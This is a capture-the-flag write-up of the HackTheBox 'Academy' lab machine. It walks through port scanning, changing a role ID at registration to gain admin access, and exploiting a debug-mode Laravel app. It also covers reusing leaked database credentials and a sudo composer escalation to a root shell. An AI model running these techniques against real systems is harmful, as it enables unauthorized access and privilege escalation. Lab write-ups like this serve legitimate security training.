HTB Academy
Writeup for Academy box on HackTheBox.eu
Initial enumeration
Inital port scan
sudo nmap -sC -sV -vv -oA tcp 10.129.80.186 && sudo nmap -sC -sV -vv -oA allports -p- 10.129.80.186
When we browse to the IP we get redirected to academy.htb so let's add that to our hosts file.
Once there we are presented with a login / register link.
Creating an account with test/test allows us to login and see a panel of data.
Proxying our traffic through burp shows us that the application is contacting a /api/modules path, this looks intresting.
The api paths are 404-ing so moving on.
Running ffuf on the main application
ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://academy.htb/FUZZ -c -e .php,.txt,.zip
Checking the original register request, we notice that we are seding in a roleid=0 Change the role to 1 and see what happens
uid=test1&password=test&confirm=test&roleid=1
After we create a new account and try to login to the admin.php page we get some more information:
We discover a new subdomain so we add it to our hosts file
dev-staging-01.academy.htb
While accesing the website on this subdomain we discover it's a Laravel framework application but showing an error page, this tells us it's also in debug mode
Trying to connect to MySQL on port 33060 fails without an error.
Initial foothold
There is an metasploit exploit for laravel
Browsing to the /var/www/html/academy folder we discover this is also a laravel app and we get a set of credentials for mysql
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
Using the password from mysql we try and login with the users found in /home/
21y4d
ch4p
cry0l1t3
egre55
g0blin
mrb3n
We get a hit
User enumeration
Our user is in the adm group and we have permissions to read some log files, let's see what we can find.
We can read auth and audit logs.
Let's run linpeas to see if it can find something interesting for us: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
And we get something interesting
Credentials: mrb3n / [email protected]!
After ssh-ing in as mrb3n and testing sudo -l we seem to be able to execute composer as sudo
Privilege escalation
Looking a https://gtfobins.github.io/gtfobins/composer/#sudo we can actually execute a bash command while running composer
TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x